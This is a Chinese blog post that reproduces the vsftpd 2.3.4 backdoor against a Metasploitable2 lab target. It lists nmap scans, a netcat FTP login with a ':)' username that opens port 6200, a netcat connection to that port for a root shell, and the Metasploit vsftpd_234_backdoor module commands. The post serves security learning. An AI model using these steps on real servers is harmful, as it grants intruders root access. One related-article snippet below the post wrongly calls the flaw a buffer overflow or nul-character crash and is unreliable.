笑脸漏洞(VSFTPD2.3.4)复现

最新推荐文章于 2024-05-10 22:24:53 发布
最新推荐文章于 2024-05-10 22:24:53 发布
阅读量8.2k 收藏 45
点赞数 9
分类专栏: 渗透测试 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52497013/article/details/121090861
版权

笑脸漏洞(VSFTPD2.3.4)复现

漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。

攻击机:kali linux

靶机:Metasploitable2

复现过程

  1. Nmap扫描同网断的靶机,观察靶机上的服务开放情况:
nmap 192.168.43.0/24

在这里插入图片描述

  1. 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4:
nmap -sV 192.168.43.150

在这里插入图片描述
在这里插入图片描述
3. 利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入。
例如:user a:) pass 123456

nc 192.168.43.150 21

在这里插入图片描述
4. 用nmap扫描端口6200,观察端口打开情况:
在这里插入图片描述
6200端口已经open。
5. 用nc连接6200端口,成功以root身份登入,漏洞复现完毕:
在这里插入图片描述

wireshark抓包分析

对刚刚实施的漏洞复现操作,可以观察到nc是如何工作的。
在这里插入图片描述
在这里插入图片描述

Metasploit利用脚本复现

(1)命令行输入msfconsole打开Metasploit,搜索vsftpd2.3.4的漏洞脚本

search vsftpd 2.3.4

在这里插入图片描述
(2)使用use命令,使用漏洞脚本

use exploit/unix/ftp/vsftpd_234_backdoor 
info #查看漏洞主要信息 
set rhost 192.168.43.150

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
成功以root身份登录,漏洞复现完成。

_AaRong_
关注
  • 9
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vsftpd 2.3.4 带漏洞版本 可复现
09-26
在分析或研究此漏洞的过程中,"vsftpd-2.3.4-infected"这个文件可能是包含了被该漏洞影响的vsftpd服务的复现环境或者漏洞利用脚本。这样的资源对于安全研究人员理解漏洞机制、开发检测工具和构建防御策略非常有价值...
渗透测试(笑脸漏洞
m0_74300881的博客
12-13 338
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
Ftp笑脸漏洞VSFTPD 2.3.4)复现(后门漏洞
最新发布
m0_62670778的博客
05-10 916
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4856
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 885
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
笑脸漏洞复现
qq_62623325的博客
11-24 795
笑脸漏洞复现
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制...
网络安全 批量执行vsftpd2.3.4漏洞
04-21
可以批量执行笑脸漏洞,支持多线程
vsftpd_2.3.4.zip
12-28
在这里,`vsftpd 2.3.4`作为靶机的一部分,可以用于测试笑脸漏洞的利用方法,以及验证和开发防御策略。 3. **安装.txt** - `安装.txt`文件通常包含安装或配置软件的步骤和指南。在这个场景下,它可能提供了在系统...
Linux 源代码 编译安装vsftpd-2.3.4
03-19
本文将深入探讨如何编译安装vsftpd-2.3.4这一特定版本,以及如何进行配置,以确保您的FTP服务既高效又安全。 首先,我们需要了解vsftpd。它是一个免费的开源FTP服务器软件,设计时注重安全性,支持多种安全特性,如...
Linux(kali)笑脸漏洞实验
Selma003的博客
04-11 2169
笑脸漏洞实战感受
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1822
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
漏洞扫描技术
Q2017977021的博客
04-09 1057
漏洞扫描技术是一种用于检测计算机系统、网络或应用程序中存在的安全漏洞的方法。它通过自动化工具或软件来扫描系统,以发现可能被黑客利用的漏洞或弱点。
第5章 漏洞扫描技术
2302_76170520的博客
04-13 869
漏洞信息库是专门用于收集、存储和管理程序漏洞信息的数据库。它是信息安全领域的重要组成部分,对于提高信息系统的安全性和应对网络攻击具有重要意义。漏洞收录:收集来自各种渠道的漏洞信息,包括公开的漏洞报告、安全研究人员的发现以及厂商发布的漏洞补丁等。漏洞分类与描述:对收录的漏洞进行分类和描述,包括漏洞类型、影响范围、利用方式等,以便于用户快速了解漏洞的相关信息。漏洞风险评估:对漏洞进行风险评估,分析漏洞的严重程度、影响范围以及可能带来的风险,为用户制定安全防护策略提供参考。
笑脸:)漏洞
xujing19920814的博客
10-01 236
笑脸漏洞
笑脸漏洞的常规实现
Radiency的博客
11-24 1795
笑脸漏洞 利用vsftpd-2.3.4远程控制目标主机
vsftpd 2.3.4 带漏洞版本
06-24
### 回答1: vsftpd 2.3.4 是一个包含漏洞的FTP服务器软件。这个漏洞版本的FTP服务器软件可以让攻击者远程攻击FTP服务器,从而访问FTP服务器上的敏感数据。这个漏洞是由于软件中存在的安全缺陷造成的。攻击者可以通过发送特殊数据包来利用这个漏洞,这个过程被称为缓冲区溢出攻击。这种攻击可以让攻击者注入恶意代码到服务器上,从而获取敏感信息或控制FTP服务器。因此,如果您使用vsftpd 2.3.4版本,建议您及时升级到最新版本来避免被攻击。同时,您还可以采取其他措施来保护FTP服务器的安全性,例如加强密码策略,限制FTP服务器的访问权限等等。确保FTP服务器的安全性对于任何类型的组织和个人来说都至关重要,因为FTP服务器承载着有关用户和业务的敏感信息。 ### 回答2: vsftpd是一个非常流行的FTP服务器软件,很多Linux发行版都会默认安装这个软件。然而,早期的版本中存在一个漏洞,即在处理传输过程中的命令时,如果恶意用户发送了一个命令包括 nul 字符(ASCII 0),则可能导致 vsftpd服务程序崩溃,并且这种情况下所创建的进程可以被攻击者所利用。 这个漏洞版本的 vsftpd 2.3.4,如果被攻击者利用,可以很容易地导致系统崩溃或远程执行代码。此外,在攻击者访问操作系统级别之前,不需要进行身份验证,这对服务器来说是非常危险的。 为了解决这个漏洞vsftpd的开发者已经针对这个版本发布了更新。用户应该确保他们的vsftpd版本是最新的,并采取适当的安全措施来保护服务器。最好的方法之一是限制使用vsftpd的用户,使他们只有必要的权限,还可以采用防火墙、IDS等技术来增加服务器安全性。此外,定期检查和升级相关软件也是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_AaRong_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值